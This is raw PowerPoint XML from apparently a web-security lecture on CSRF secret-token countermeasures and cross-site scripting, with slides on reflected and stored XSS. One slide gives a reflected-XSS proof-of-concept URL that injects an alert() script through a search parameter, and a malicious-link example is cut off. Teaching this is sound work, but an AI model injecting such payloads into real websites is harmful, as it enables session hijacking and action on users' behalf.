              <a:t>Pages from a different origin will not be able to access the secret value - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the same origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The secret is randomly generated and is different for different users. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232666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1043608" y="548680"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasure: Secret Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1319920"/>
            <a:ext cx="7560840" cy="3897300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another way is to embed the secret token in a cookie using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SetCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> key=value and only send it with same-site requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66357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209926" y="2400732"/>
            <a:ext cx="7466530" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>cripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185098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1030567" y="404664"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Overview of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030567" y="1628800"/>
            <a:ext cx="8081220" cy="4145756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2395954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033362" y="461738"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Arc 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3768066" y="2314090"/>
            <a:ext cx="2101077" cy="1018343"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16062036"/>
              <a:gd name="adj2" fmla="val 2358492"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="1270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1780360"/>
            <a:ext cx="5467782" cy="3104145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB7A276F-A425-9345-B2FF-187C74BF0B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="5085184"/>
            <a:ext cx="5760640" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site in CSRF means </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site in XSS means </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crossing the (same) site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2983414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033362" y="461738"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033362" y="1340768"/>
            <a:ext cx="7816662" cy="3807411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>In XSS, an attacker injects his/her malicious code to the victim’s browser via the target website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>When code comes from a website, it is considered trusted with respect to the website, so it can access and change the content on the pages, read cookies belonging to the website and sending out requests on behalf of the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFontTx/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Basically, code can do whatever the user can do inside the session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1795297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1091960" y="593367"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Types of XSS Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094090" y="1700808"/>
            <a:ext cx="8520600" cy="2061000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Non-persistent (Reflected) XSS Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent (Stored) XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1005121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1043608" y="404664"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Non-persistent (Reflected) XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Shape 80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="1772816"/>
            <a:ext cx="5364744" cy="3162027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="4941841"/>
            <a:ext cx="4054800" cy="2530800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many websites have reflective behaviors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="461400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971600" y="404664"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Cross-Site Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Shape 66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="1772816"/>
            <a:ext cx="5040560" cy="3312368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2483777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1043608" y="404664"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Non-persistent (Reflected) XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="1628800"/>
            <a:ext cx="7272808" cy="3168352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>If a website with a reflective </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t> takes user inputs, then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Attackers can put JavaScript code in the input, so when the input is reflected back, the JavaScript code will be injected into the web page from the website. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="473956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1043608" y="548680"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Non-persistent (Reflected) XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 87"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1312280"/>
            <a:ext cx="7416824" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assume a vulnerable service on website : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.example.com/search?input=word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, where word is provided by the users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How do you exploit the URL as an attacker in an XSS attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.example.com/search?input=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“attack”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63722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1043608" y="548680"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Non-persistent (Reflected) XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 87"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1312280"/>
            <a:ext cx="7776864" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once the victim clicks on this link, an HTTP GET request will be sent to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> web server, which returns a page containing the search result, with the original input in the page. The input here is a JavaScript code which runs and gives a pop-up message on the victim’s browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="590609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976064" y="112713"/>
            <a:ext cx="7772400" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Reflected XSS: An Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69638"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327" y="895350"/>
            <a:ext cx="4113212"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Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1157039" y="317500"/>
            <a:ext cx="7407275" cy="2311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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>The malicious link may look like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>http://hack-yourself-</a:t>
            </a:r>
            <a:r>
